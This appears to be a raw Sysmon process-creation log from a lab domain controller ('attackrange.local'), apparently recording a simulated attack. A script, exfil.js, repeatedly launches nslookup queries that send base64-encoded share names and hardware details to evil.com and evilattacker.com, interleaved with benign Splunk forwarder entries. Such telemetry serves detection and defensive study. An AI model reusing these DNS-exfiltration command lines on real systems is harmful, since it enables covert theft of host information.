15:24:06.071{A8622C2F-5A96-6078-E60E-00000000AE01}6516C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzcottg.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000071256Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:53.602{A8622C2F-5A89-6078-E50E-00000000AE01}3376C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft 
Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A89-6078-E30E-00000000AE01}6696C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluow.tmp 2>&1 154100x800000000000000071245Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:53.573{A8622C2F-5A89-6078-E30E-00000000AE01}6696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluow.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071170Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:39.130{A8622C2F-5A7B-6078-E20E-00000000AE01}5308C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A7B-6078-E00E-00000000AE01}4680C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxwa.tmp 2>&1 154100x800000000000000071159Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:39.098{A8622C2F-5A7B-6078-E00E-00000000AE01}4680C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxwa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071150Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:38.475{A8622C2F-5A7A-6078-DF0E-00000000AE01}1408C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A7A-6078-DD0E-00000000AE01}1140C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnscr.tmp 2>&1 154100x800000000000000071139Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:38.445{A8622C2F-5A7A-6078-DD0E-00000000AE01}1140C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnscr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071083Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:36.021{A8622C2F-5A78-6078-DC0E-00000000AE01}5424C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com 
C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A77-6078-DA0E-00000000AE01}7036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcbcov.tmp 2>&1 154100x800000000000000071072Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:35.991{A8622C2F-5A77-6078-DA0E-00000000AE01}7036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcbcov.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000071010Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:23.530{A8622C2F-5A6B-6078-D90E-00000000AE01}6088C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A6B-6078-D70E-00000000AE01}7016C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgajma.tmp 2>&1 154100x800000000000000070999Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:23.500{A8622C2F-5A6B-6078-D70E-00000000AE01}7016C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgajma.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:22.345{A8622C2F-5A6A-6078-D60E-00000000AE01}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070970Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:20.527{A8622C2F-5A68-6078-D50E-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070960Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:19.850{A8622C2F-5A67-6078-D40E-00000000AE01}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070949Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:19.275{A8622C2F-5A67-6078-D30E-00000000AE01}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070924Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:17.477{A8622C2F-5A65-6078-D20E-00000000AE01}3904C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070912Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:16.857{A8622C2F-5A64-6078-D10E-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000070902Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:16.187{A8622C2F-5A64-6078-D00E-00000000AE01}2196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070859Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:07.392{A8622C2F-5A5B-6078-CF0E-00000000AE01}6012C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A5B-6078-CD0E-00000000AE01}6652C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkzoqp.tmp 2>&1 154100x800000000000000070848Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:07.361{A8622C2F-5A5B-6078-CD0E-00000000AE01}6652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating 
SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkzoqp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070839Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:06.806{A8622C2F-5A5A-6078-CC0E-00000000AE01}3500C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A5A-6078-CA0E-00000000AE01}6112C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzhyy.tmp 2>&1 154100x800000000000000070828Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:06.776{A8622C2F-5A5A-6078-CA0E-00000000AE01}6112C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzhyy.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070795Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:06.030{A8622C2F-5A5A-6078-C90E-00000000AE01}4604C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A5A-6078-C70E-00000000AE01}4976C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsutr.tmp 2>&1 154100x800000000000000070784Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:06.000{A8622C2F-5A5A-6078-C70E-00000000AE01}4976C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsutr.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070768Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:05.941{A8622C2F-5A59-6078-C60E-00000000AE01}6164C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A59-6078-C40E-00000000AE01}6032C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltqbq.tmp 2>&1 154100x800000000000000070757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:05.911{A8622C2F-5A59-6078-C40E-00000000AE01}6032C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltqbq.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000070728Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:05.231{A8622C2F-5A59-6078-C30E-00000000AE01}5988C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A59-6078-C10E-00000000AE01}4856C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldzsoz.tmp 2>&1 154100x800000000000000070717Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:05.200{A8622C2F-5A59-6078-C10E-00000000AE01}4856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldzsoz.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070684Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:04.467{A8622C2F-5A58-6078-C00E-00000000AE01}3500C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A58-6078-BE0E-00000000AE01}4940C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmldkf.tmp 2>&1 154100x800000000000000070673Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:04.438{A8622C2F-5A58-6078-BE0E-00000000AE01}4940C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmldkf.tmp 
